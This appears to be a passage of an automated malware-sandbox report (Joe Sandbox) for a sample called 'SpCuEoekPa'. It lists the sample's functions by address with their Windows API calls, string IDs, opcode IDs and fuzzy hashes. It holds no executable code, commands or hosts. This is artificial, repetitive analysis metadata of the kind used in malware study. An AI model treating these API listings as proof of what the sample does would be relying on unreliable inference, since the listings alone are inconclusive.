                                                            • Instruction Fuzzy Hash: 9951A070900B05DBDB26DF65C9927EBB7F8EF04304F20896EE54ADB691E774AA44CB40
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C27C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003C27DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 003C2822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00425890,00000000), ref: 003C286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                            • Instruction ID: e05482ef70037dcf86b16d9867ee06182ba2334b41b475e405958f4079e33ff3
                                                            • Opcode Fuzzy Hash: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                            • Instruction Fuzzy Hash: 3A417C702043419FDB22EF25D884F5BBBA8AF85314F054A2DF965DB291DB70AC05CB62
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                              • Part of subcall function 0036784B: _memmove.LIBCMT ref: 00367899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 64ff304c43639b79ac6967ba44742f394e6b5412f9a861b01f377bc92c418460
                                                            • Instruction ID: be98efb75cef753cb87222d16e5fe9b1ca5b298673fdde6da47cb4d313d6e546
                                                            • Opcode Fuzzy Hash: 64ff304c43639b79ac6967ba44742f394e6b5412f9a861b01f377bc92c418460
                                                            • Instruction Fuzzy Hash: BC31A172904219ABCF06EF54C8519EEB3B4FF14320B10866AE8759B7D5DB71AD05CB80
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003B8F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003B8F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 003B8F57
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 7819fe8e6515c961791cabfe0ba68d810962699ef3815c8239eea063e1f782df
                                                            • Instruction ID: 14aa81787e5c9e67294c862c5543683558dc0b2aa05774aed7f5b993aa683643
                                                            • Opcode Fuzzy Hash: 7819fe8e6515c961791cabfe0ba68d810962699ef3815c8239eea063e1f782df
                                                            • Instruction Fuzzy Hash: E621F071A04104BEDB16ABB0DC85DFFB76DDF05328F108629F5219B1E1DF394909D620
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D18A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                              • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                              • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                            • Instruction ID: 0f0c449ee66fbe8907d42d2ddcd652d6b99b2d19f34036058ef62bfbc914eeae
                                                            • Opcode Fuzzy Hash: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                            • Instruction Fuzzy Hash: 2E217FB2500208BFEB22DB65EC85EBB76EDEB48754F10412BF8059A340DA719D0567A1
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E6461
                                                            • LoadLibraryW.KERNEL32(?), ref: 003E6468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E647D
                                                            • DestroyWindow.USER32(?), ref: 003E6485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                            • Instruction ID: fb317abf870343457f114af52dfb8c5c8394c26f0045f6eb5f892ff9bf017f7a
                                                            • Opcode Fuzzy Hash: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                            • Instruction Fuzzy Hash: B721CF712002A5BFEF124F66DC82EBB37ACEB683A4F114729F910961D0D771DC419B20
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003C6DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003C6E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C6E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                            • Instruction ID: 30b391039e59a8fc13043d970ca89f5a6c106efdb179e429ee18934f75527c23
                                                            • Opcode Fuzzy Hash: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                            • Instruction Fuzzy Hash: 0321817560020AABDB219F29DC4AF9A77B8EF44720F204A2DFDA1DB2D0D7709D518B50
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 003C6E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 003C6ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C6F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                            • Instruction ID: c043e5d6e257ba6fc2082a71f4bff4c5ccf993d6776bbb0caaf5121b473cb8bf
                                                            • Opcode Fuzzy Hash: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                            • Instruction Fuzzy Hash: 87218E795003059BDB219F79DD46FAA77A8AF45720F204A1EF9A0D72D0D770AC518B50
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CAC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CACA8
                                                            • __swprintf.LIBCMT ref: 003CACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,003EF910), ref: 003CACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                            • Instruction ID: e4873a8ad682445ff86aeb75af7fa36b420be692b6c8fe791f9c75f616c0758d
                                                            • Opcode Fuzzy Hash: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                            • Instruction Fuzzy Hash: CA216030A00109AFCB11EF65C985EEE7BBCEF49714B008569F909EB252DB71EA41CB61
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C1184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C11C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @<
                                                            • API String ID: 2875609808-354047512
                                                            • Opcode ID: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                            • Instruction ID: b0f1f435e29798892461cfc33c75a46dd0582fcb816632f954f9db39b3b5cb18
                                                            • Opcode Fuzzy Hash: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                            • Instruction Fuzzy Hash: B4117C31C0061CDBCF029FA4D899BEEBB78FF0A711F054159EA40F6281CB749950DBA5
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 003C1B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                            • Instruction ID: 5ed369204e3c270ec8f6a3f269c52e27421baf413c813955601463ef42a3d31d
                                                            • Opcode Fuzzy Hash: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                            • Instruction Fuzzy Hash: 3C118B349102089FCF09EFA4D8529EEB3B4FF26304B5084A9D814AB292EB325D0ADF50
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003DEC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003DEC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003DED6A
                                                            • CloseHandle.KERNEL32(?), ref: 003DEDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                            • Instruction ID: 80cfe6c10feeb007a31ed7f04cc7e92686aa0ef63bc83ad3f18c18e035b3df71
                                                            • Opcode Fuzzy Hash: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                            • Instruction Fuzzy Hash: F88152B16043009FD722EF18D886B2AB7E9AF59710F04891EF9559F3D2DA71AC408B51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: 8f25456cb4f95a7e602415a32a972dabac365bfbc413d7dc428e341e0b819b97
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C651D731A00B05DBDF27AF79D84066E77A6AF41321F2587A9F836972D0D770DE948B40
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E00FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E0183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 003E01AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E01BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                            • Instruction ID: b56d4c06c590a449241c291f873ab227db1fb457493e661e29cad25d081c3461
                                                            • Opcode Fuzzy Hash: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                            • Instruction Fuzzy Hash: 51515D71208244AFD716EF54C881F6AB7E9FF84314F408A2DF5958B2A2DB71ED44CB52
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DD927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003DD9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 003DD9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003DDA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DDA21
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                            • Instruction ID: dbaec1b07539e4d3ec4c016e540d148a2c7ecdd856b0ae26b8d21db4ecf69390
                                                            • Opcode Fuzzy Hash: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                            • Instruction Fuzzy Hash: 0C511636A00209DFCB12EFA8D4949ADB7F8EF19320B05C16AE855AB352D731AD45CF90
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003CE61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003CE648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003CE687
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003CE6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003CE6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: 4026f584652faa7046055c69aae0ff1e31a4397c0c13430205dfe6978ccc02d6
                                                            • Instruction ID: 1259f4c50b623f0d473334d96adb807cb4af9d824877be4dfa3634d63cafeb44
                                                            • Opcode Fuzzy Hash: 4026f584652faa7046055c69aae0ff1e31a4397c0c13430205dfe6978ccc02d6
                                                            • Instruction Fuzzy Hash: 4151FB35A00205DFCB16EF64C981AAEBBF9EF09314F1484A9E909AF365CB31ED15DB50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                            • Instruction ID: b68b191bb3f0d31290d6aabb6cacdf6ac0946b6811f311c64e1ab2ed785b1dc7
                                                            • Opcode Fuzzy Hash: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                            • Instruction Fuzzy Hash: A141F9359049A4AFD722DF35CC88FE9BBA8EB09310F164365F816A72E0C770BD41DA51
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00362357
                                                            • ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00362399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
